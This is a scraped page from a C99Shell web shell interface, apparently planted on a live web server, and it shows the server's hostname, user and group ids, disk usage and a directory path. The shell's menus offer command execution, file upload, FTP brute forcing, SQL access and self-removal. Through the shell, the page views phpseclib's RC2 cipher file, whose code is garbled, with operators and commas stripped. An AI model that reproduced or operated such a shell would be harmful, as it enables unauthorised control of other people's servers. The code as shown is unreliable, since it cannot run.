!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.smm.picotech.app/public_html/vendor/phpseclib/phpseclib/phpseclib/Crypt/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RC2.php (21.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Pure-PHP implementation of RC2.
 *
 * Uses mcrypt, if available, and an internal implementation, otherwise.
 *
 * PHP version 5
 *
 * Useful resources are as follows:
 *
 *  - {@link http://tools.ietf.org/html/rfc2268}
 *
 * Here's a short example of how to use this library:
 * <code>
 * <?php
 *    include 'vendor/autoload.php';
 *
 *    $rc2 = new \phpseclib3\Crypt\RC2('ctr');
 *
 *    $rc2->setKey('abcdefgh');
 *
 *    $plaintext = str_repeat('a', 1024);
 *
 *    echo $rc2->decrypt($rc2->encrypt($plaintext));
 * ?>
 * </code>
 *
 * @author   Patrick Monnerat <pm@datasphere.ch>
 * @license  http://www.opensource.org/licenses/mit-license.html  MIT License
 * @link     http://phpseclib.sourceforge.net
 */

namespace phpseclib3\Crypt;

use 
phpseclib3\Crypt\Common\BlockCipher;
use 
phpseclib3\Exception\BadModeException;

/**
 * Pure-PHP implementation of RC2.
 *
 */
class RC2 extends BlockCipher
{
    
/**
     * Block Length of the cipher
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size
     * @var int
     */
    
protected $block_size 8;

    
/**
     * The Key
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::key
     * @see self::setKey()
     * @var string
     */
    
protected $key;

    
/**
     * The Original (unpadded) Key
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::key
     * @see self::setKey()
     * @see self::encrypt()
     * @see self::decrypt()
     * @var string
     */
    
private $orig_key;

    
/**
     * Key Length (in bytes)
     *
     * @see \phpseclib3\Crypt\RC2::setKeyLength()
     * @var int
     */
    
protected $key_length 16// = 128 bits

    /**
     * The mcrypt specific name of the cipher
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt
     * @var string
     */
    
protected $cipher_name_mcrypt 'rc2';

    
/**
     * Optimizing value while CFB-encrypting
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len
     * @var int
     */
    
protected $cfb_init_len 500;

    
/**
     * The key length in bits.
     *
     * {@internal Should be in range [1..1024].}
     *
     * {@internal Changing this value after setting the key has no effect.}
     *
     * @see self::setKeyLength()
     * @see self::setKey()
     * @var int
     */
    
private $default_key_length 1024;

    
/**
     * The key length in bits.
     *
     * {@internal Should be in range [1..1024].}
     *
     * @see self::isValidEnine()
     * @see self::setKey()
     * @var int
     */
    
private $current_key_length;

    
/**
     * The Key Schedule
     *
     * @see self::setupKey()
     * @var array
     */
    
private $keys;

    
/**
     * Key expansion randomization table.
     * Twice the same 256-value sequence to save a modulus in key expansion.
     *
     * @see self::setKey()
     * @var array
     */
    
private static $pitable = [
        
0xD90x780xF90xC40x190xDD0xB50xED,
        
0x280xE90xFD0x790x4A0xA00xD80x9D,
        
0xC60x7E0x370x830x2B0x760x530x8E,
        
0x620x4C0x640x880x440x8B0xFB0xA2,
        
0x170x9A0x590xF50x870xB30x4F0x13,
        
0x610x450x6D0x8D0x090x810x7D0x32,
        
0xBD0x8F0x400xEB0x860xB70x7B0x0B,
        
0xF00x950x210x220x5C0x6B0x4E0x82,
        
0x540xD60x650x930xCE0x600xB20x1C,
        
0x730x560xC00x140xA70x8C0xF10xDC,
        
0x120x750xCA0x1F0x3B0xBE0xE40xD1,
        
0x420x3D0xD40x300xA30x3C0xB60x26,
        
0x6F0xBF0x0E0xDA0x460x690x070x57,
        
0x270xF20x1D0x9B0xBC0x940x430x03,
        
0xF80x110xC70xF60x900xEF0x3E0xE7,
        
0x060xC30xD50x2F0xC80x660x1E0xD7,
        
0x080xE80xEA0xDE0x800x520xEE0xF7,
        
0x840xAA0x720xAC0x350x4D0x6A0x2A,
        
0x960x1A0xD20x710x5A0x150x490x74,
        
0x4B0x9F0xD00x5E0x040x180xA40xEC,
        
0xC20xE00x410x6E0x0F0x510xCB0xCC,
        
0x240x910xAF0x500xA10xF40x700x39,
        
0x990x7C0x3A0x850x230xB80xB40x7A,
        
0xFC0x020x360x5B0x250x550x970x31,
        
0x2D0x5D0xFA0x980xE30x8A0x920xAE,
        
0x050xDF0x290x100x670x6C0xBA0xC9,
        
0xD30x000xE60xCF0xE10x9E0xA80x2C,
        
0x630x160x010x3F0x580xE20x890xA9,
        
0x0D0x380x340x1B0xAB0x330xFF0xB0,
        
0xBB0x480x0C0x5F0xB90xB10xCD0x2E,
        
0xC50xF30xDB0x470xE50xA50x9C0x77,
        
0x0A0xA60x200x680xFE0x7F0xC10xAD,
        
0xD90x780xF90xC40x190xDD0xB50xED,
        
0x280xE90xFD0x790x4A0xA00xD80x9D,
        
0xC60x7E0x370x830x2B0x760x530x8E,
        
0x620x4C0x640x880x440x8B0xFB0xA2,
        
0x170x9A0x590xF50x870xB30x4F0x13,
        
0x610x450x6D0x8D0x090x810x7D0x32,
        
0xBD0x8F0x400xEB0x860xB70x7B0x0B,
        
0xF00x950x210x220x5C0x6B0x4E0x82,
        
0x540xD60x650x930xCE0x600xB20x1C,
        
0x730x560xC00x140xA70x8C0xF10xDC,
        
0x120x750xCA0x1F0x3B0xBE0xE40xD1,
        
0x420x3D0xD40x300xA30x3C0xB60x26,
        
0x6F0xBF0x0E0xDA0x460x690x070x57,
        
0x270xF20x1D0x9B0xBC0x940x430x03,
        
0xF80x110xC70xF60x900xEF0x3E0xE7,
        
0x060xC30xD50x2F0xC80x660x1E0xD7,
        
0x080xE80xEA0xDE0x800x520xEE0xF7,
        
0x840xAA0x720xAC0x350x4D0x6A0x2A,
        
0x960x1A0xD20x710x5A0x150x490x74,
        
0x4B0x9F0xD00x5E0x040x180xA40xEC,
        
0xC20xE00x410x6E0x0F0x510xCB0xCC,
        
0x240x910xAF0x500xA10xF40x700x39,
        
0x990x7C0x3A0x850x230xB80xB40x7A,
        
0xFC0x020x360x5B0x250x550x970x31,
        
0x2D0x5D0xFA0x980xE30x8A0x920xAE,
        
0x050xDF0x290x100x670x6C0xBA0xC9,
        
0xD30x000xE60xCF0xE10x9E0xA80x2C,
        
0x630x160x010x3F0x580xE20x890xA9,
        
0x0D0x380x340x1B0xAB0x330xFF0xB0,
        
0xBB0x480x0C0x5F0xB90xB10xCD0x2E,
        
0xC50xF30xDB0x470xE50xA50x9C0x77,
        
0x0A0xA60x200x680xFE0x7F0xC10xAD
    
];

    
/**
     * Inverse key expansion randomization table.
     *
     * @see self::setKey()
     * @var array
     */
    
private static $invpitable = [
        
0xD10xDA0xB90x6F0x9C0xC80x780x66,
        
0x800x2C0xF80x370xEA0xE00x620xA4,
        
0xCB0x710x500x270x4B0x950xD90x20,
        
0x9D0x040x910xE30x470x6A0x7E0x53,
        
0xFA0x3A0x3B0xB40xA80xBC0x5F0x68,
        
0x080xCA0x8F0x140xD70xC00xEF0x7B,
        
0x5B0xBF0x2F0xE50xE20x8C0xBA0x12,
        
0xE10xAF0xB20x540x5D0x590x760xDB,
        
0x320xA20x580x6E0x1C0x290x640xF3,
        
0xE90x960x0C0x980x190x8D0x3E0x26,
        
0xAB0xA50x850x160x400xBD0x490x67,
        
0xDC0x220x940xBB0x3C0xC10x9B0xEB,
        
0x450x280x180xD80x1A0x420x7D0xCC,
        
0xFB0x650x8E0x3D0xCD0x2A0xA30x60,
        
0xAE0x930x8A0x480x970x510x150xF7,
        
0x010x0B0xB70x360xB10x2E0x110xFD,
        
0x840x2D0x3F0x130x880xB30x340x24,
        
0x1B0xDE0xC50x1D0x4D0x2B0x170x31,
        
0x740xA90xC60x430x6D0x390x900xBE,
        
0xC30xB00x210x6B0xF60x0F0xD50x99,
        
0x0D0xAC0x1F0x5C0x9E0xF50xF90x4C,
        
0xD60xDF0x890xE40x8B0xFF0xC70xAA,
        
0xE70xED0x460x250xB60x060x5E0x35,
        
0xB50xEC0xCE0xE80x6C0x300x550x61,
        
0x4A0xFE0xA00x790x030xF00x100x72,
        
0x7C0xCF0x520xA60xA70xEE0x440xD3,
        
0x9A0x570x920xD00x5A0x7A0x410x7F,
        
0x0E0x000x630xF20x4F0x050x830xC9,
        
0xA10xD40xDD0xC40x560xF40xD20x77,
        
0x810x090x820x330x9F0x070x860x75,
        
0x380x4E0x690xF10xAD0x230x730x87,
        
0x700x020xC20x1E0xB80x0A0xFC0xE6
    
];

    
/**
     * Default Constructor.
     *
     * @param string $mode
     * @throws \InvalidArgumentException if an invalid / unsupported mode is provided
     */
    
public function __construct($mode)
    {
        
parent::__construct($mode);

        if (
$this->mode == self::MODE_STREAM) {
            throw new 
BadModeException('Block ciphers cannot be ran in stream mode');
        }
    }

    
/**
     * Test for engine validity
     *
     * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine()
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct()
     * @param int $engine
     * @return bool
     */
    
protected function isValidEngineHelper($engine)
    {
        switch (
$engine) {
            case 
self::ENGINE_OPENSSL:
                if (
$this->current_key_length != 128 || strlen($this->orig_key) < 16) {
                    return 
false;
                }
                
// quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1
                // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider"
                // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not
                
if (defined('OPENSSL_VERSION_TEXT') && version_compare(preg_replace('#OpenSSL (\d+\.\d+\.\d+) .*#''$1'OPENSSL_VERSION_TEXT), '3.0.1''>=')) {
                    return 
false;
                }
                
$this->cipher_name_openssl_ecb 'rc2-ecb';
                
$this->cipher_name_openssl 'rc2-' $this->openssl_translate_mode();
        }

        return 
parent::isValidEngineHelper($engine);
    }

    
/**
     * Sets the key length.
     *
     * Valid key lengths are 8 to 1024.
     * Calling this function after setting the key has no effect until the next
     *  \phpseclib3\Crypt\RC2::setKey() call.
     *
     * @param int $length in bits
     * @throws \LengthException if the key length isn't supported
     */
    
public function setKeyLength($length)
    {
        if (
$length || $length 1024) {
            throw new 
\LengthException('Key size of ' $length ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported');
        }

        
$this->default_key_length $this->current_key_length $length;
        
$this->explicit_key_length $length >> 3;
    }

    
/**
     * Returns the current key length
     *
     * @return int
     */
    
public function getKeyLength()
    {
        return 
$this->current_key_length;
    }

    
/**
     * Sets the key.
     *
     * Keys can be of any length. RC2, itself, uses 8 to 1024 bit keys (eg.
     * strlen($key) <= 128), however, we only use the first 128 bytes if $key
     * has more then 128 bytes in it, and set $key to a single null byte if
     * it is empty.
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey()
     * @param string $key
     * @param int|boolean $t1 optional Effective key length in bits.
     * @throws \LengthException if the key length isn't supported
     */
    
public function setKey($key$t1 false)
    {
        
$this->orig_key $key;

        if (
$t1 === false) {
            
$t1 $this->default_key_length;
        }

        if (
$t1 || $t1 1024) {
            throw new 
\LengthException('Key size of ' $length ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported');
        }

        
$this->current_key_length $t1;
        if (
strlen($key) < || strlen($key) > 128) {
            throw new 
\LengthException('Key of size ' strlen($key) . ' not supported by this algorithm. Only keys of sizes between 8 and 1024 bits, inclusive, are supported');
        }

        
$t strlen($key);

        
// The mcrypt RC2 implementation only supports effective key length
        // of 1024 bits. It is however possible to handle effective key
        // lengths in range 1..1024 by expanding the key and applying
        // inverse pitable mapping to the first byte before submitting it
        // to mcrypt.

        // Key expansion.
        
$l array_values(unpack('C*'$key));
        
$t8 = ($t1 7) >> 3;
        
$tm 0xFF >> ($t8 $t1);

        
// Expand key.
        
$pitable self::$pitable;
        for (
$i $t$i 128$i++) {
            
$l[$i] = $pitable[$l[$i 1] + $l[$i $t]];
        }
        
$i 128 $t8;
        
$l[$i] = $pitable[$l[$i] & $tm];
        while (
$i--) {
            
$l[$i] = $pitable[$l[$i 1] ^ $l[$i $t8]];
        }

        
// Prepare the key for mcrypt.
        
$l[0] = self::$invpitable[$l[0]];
        
array_unshift($l'C*');

        
$this->key pack(...$l);
        
$this->key_length strlen($this->key);
        
$this->changed $this->nonIVChanged true;
        
$this->setEngine();
    }

    
/**
     * Encrypts a message.
     *
     * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::encrypt, with some additional OpenSSL handling code
     *
     * @see self::decrypt()
     * @param string $plaintext
     * @return string $ciphertext
     */
    
public function encrypt($plaintext)
    {
        if (
$this->engine == self::ENGINE_OPENSSL) {
            
$temp $this->key;
            
$this->key $this->orig_key;
            
$result parent::encrypt($plaintext);
            
$this->key $temp;
            return 
$result;
        }

        return 
parent::encrypt($plaintext);
    }

    
/**
     * Decrypts a message.
     *
     * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::decrypt, with some additional OpenSSL handling code
     *
     * @see self::encrypt()
     * @param string $ciphertext
     * @return string $plaintext
     */
    
public function decrypt($ciphertext)
    {
        if (
$this->engine == self::ENGINE_OPENSSL) {
            
$temp $this->key;
            
$this->key $this->orig_key;
            
$result parent::decrypt($ciphertext);
            
$this->key $temp;
            return 
$result;
        }

        return 
parent::decrypt($ciphertext);
    }

    
/**
     * Encrypts a block
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::encryptBlock()
     * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt()
     * @param string $in
     * @return string
     */
    
protected function encryptBlock($in)
    {
        list(
$r0$r1$r2$r3) = array_values(unpack('v*'$in));
        
$keys $this->keys;
        
$limit 20;
        
$actions = [$limit => 4444 => 64];
        
$j 0;

        for (;;) {
            
// Mixing round.
            
$r0 = (($r0 $keys[$j++] + ((($r1 $r2) & $r3) ^ $r1)) & 0xFFFF) << 1;
            
$r0 |= $r0 >> 16;
            
$r1 = (($r1 $keys[$j++] + ((($r2 $r3) & $r0) ^ $r2)) & 0xFFFF) << 2;
            
$r1 |= $r1 >> 16;
            
$r2 = (($r2 $keys[$j++] + ((($r3 $r0) & $r1) ^ $r3)) & 0xFFFF) << 3;
            
$r2 |= $r2 >> 16;
            
$r3 = (($r3 $keys[$j++] + ((($r0 $r1) & $r2) ^ $r0)) & 0xFFFF) << 5;
            
$r3 |= $r3 >> 16;

            if (
$j === $limit) {
                if (
$limit === 64) {
                    break;
                }

                
// Mashing round.
                
$r0 += $keys[$r3 0x3F];
                
$r1 += $keys[$r0 0x3F];
                
$r2 += $keys[$r1 0x3F];
                
$r3 += $keys[$r2 0x3F];
                
$limit $actions[$limit];
            }
        }

        return 
pack('vvvv'$r0$r1$r2$r3);
    }

    
/**
     * Decrypts a block
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::decryptBlock()
     * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt()
     * @param string $in
     * @return string
     */
    
protected function decryptBlock($in)
    {
        list(
$r0$r1$r2$r3) = array_values(unpack('v*'$in));
        
$keys $this->keys;
        
$limit 44;
        
$actions = [$limit => 2020 => 0];
        
$j 64;

        for (;;) {
            
// R-mixing round.
            
$r3 = ($r3 | ($r3 << 16)) >> 5;
            
$r3 = ($r3 $keys[--$j] - ((($r0 $r1) & $r2) ^ $r0)) & 0xFFFF;
            
$r2 = ($r2 | ($r2 << 16)) >> 3;
            
$r2 = ($r2 $keys[--$j] - ((($r3 $r0) & $r1) ^ $r3)) & 0xFFFF;
            
$r1 = ($r1 | ($r1 << 16)) >> 2;
            
$r1 = ($r1 $keys[--$j] - ((($r2 $r3) & $r0) ^ $r2)) & 0xFFFF;
            
$r0 = ($r0 | ($r0 << 16)) >> 1;
            
$r0 = ($r0 $keys[--$j] - ((($r1 $r2) & $r3) ^ $r1)) & 0xFFFF;

            if (
$j === $limit) {
                if (
$limit === 0) {
                    break;
                }

                
// R-mashing round.
                
$r3 = ($r3 $keys[$r2 0x3F]) & 0xFFFF;
                
$r2 = ($r2 $keys[$r1 0x3F]) & 0xFFFF;
                
$r1 = ($r1 $keys[$r0 0x3F]) & 0xFFFF;
                
$r0 = ($r0 $keys[$r3 0x3F]) & 0xFFFF;
                
$limit $actions[$limit];
            }
        }

        return 
pack('vvvv'$r0$r1$r2$r3);
    }

    
/**
     * Creates the key schedule
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey()
     */
    
protected function setupKey()
    {
        if (!isset(
$this->key)) {
            
$this->setKey('');
        }

        
// Key has already been expanded in \phpseclib3\Crypt\RC2::setKey():
        // Only the first value must be altered.
        
$l unpack('Ca/Cb/v*'$this->key);
        
array_unshift($lself::$pitable[$l['a']] | ($l['b'] << 8));
        unset(
$l['a']);
        unset(
$l['b']);
        
$this->keys $l;
    }

    
/**
     * Setup the performance-optimized function for de/encrypt()
     *
     * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt()
     */
    
protected function setupInlineCrypt()
    {
        
// Init code for both, encrypt and decrypt.
        
$init_crypt '$keys = $this->keys;';

        
$keys $this->keys;

        
// $in is the current 8 bytes block which has to be en/decrypt
        
$encrypt_block $decrypt_block '
            $in = unpack("v4", $in);
            $r0 = $in[1];
            $r1 = $in[2];
            $r2 = $in[3];
            $r3 = $in[4];
        '
;

        
// Create code for encryption.
        
$limit 20;
        
$actions = [$limit => 4444 => 64];
        
$j 0;

        for (;;) {
            
// Mixing round.
            
$encrypt_block .= '
                $r0 = (($r0 + ' 
$keys[$j++] . ' +
                       ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF) << 1;
                $r0 |= $r0 >> 16;
                $r1 = (($r1 + ' 
$keys[$j++] . ' +
                       ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF) << 2;
                $r1 |= $r1 >> 16;
                $r2 = (($r2 + ' 
$keys[$j++] . ' +
                       ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF) << 3;
                $r2 |= $r2 >> 16;
                $r3 = (($r3 + ' 
$keys[$j++] . ' +
                       ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF) << 5;
                $r3 |= $r3 >> 16;'
;

            if (
$j === $limit) {
                if (
$limit === 64) {
                    break;
                }

                
// Mashing round.
                
$encrypt_block .= '
                    $r0 += $keys[$r3 & 0x3F];
                    $r1 += $keys[$r0 & 0x3F];
                    $r2 += $keys[$r1 & 0x3F];
                    $r3 += $keys[$r2 & 0x3F];'
;
                
$limit $actions[$limit];
            }
        }

        
$encrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);';

        
// Create code for decryption.
        
$limit 44;
        
$actions = [$limit => 2020 => 0];
        
$j 64;

        for (;;) {
            
// R-mixing round.
            
$decrypt_block .= '
                $r3 = ($r3 | ($r3 << 16)) >> 5;
                $r3 = ($r3 - ' 
$keys[--$j] . ' -
                       ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF;
                $r2 = ($r2 | ($r2 << 16)) >> 3;
                $r2 = ($r2 - ' 
$keys[--$j] . ' -
                       ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF;
                $r1 = ($r1 | ($r1 << 16)) >> 2;
                $r1 = ($r1 - ' 
$keys[--$j] . ' -
                       ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF;
                $r0 = ($r0 | ($r0 << 16)) >> 1;
                $r0 = ($r0 - ' 
$keys[--$j] . ' -
                       ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF;'
;

            if (
$j === $limit) {
                if (
$limit === 0) {
                    break;
                }

                
// R-mashing round.
                
$decrypt_block .= '
                    $r3 = ($r3 - $keys[$r2 & 0x3F]) & 0xFFFF;
                    $r2 = ($r2 - $keys[$r1 & 0x3F]) & 0xFFFF;
                    $r1 = ($r1 - $keys[$r0 & 0x3F]) & 0xFFFF;
                    $r0 = ($r0 - $keys[$r3 & 0x3F]) & 0xFFFF;'
;
                
$limit $actions[$limit];
            }
        }

        
$decrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);';

        
// Creates the inline-crypt function
        
$this->inline_crypt $this->createInlineCryptFunction(
            [
               
'init_crypt'    => $init_crypt,
               
'encrypt_block' => $encrypt_block,
               
'decrypt_block' => $decrypt_block
            
]
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--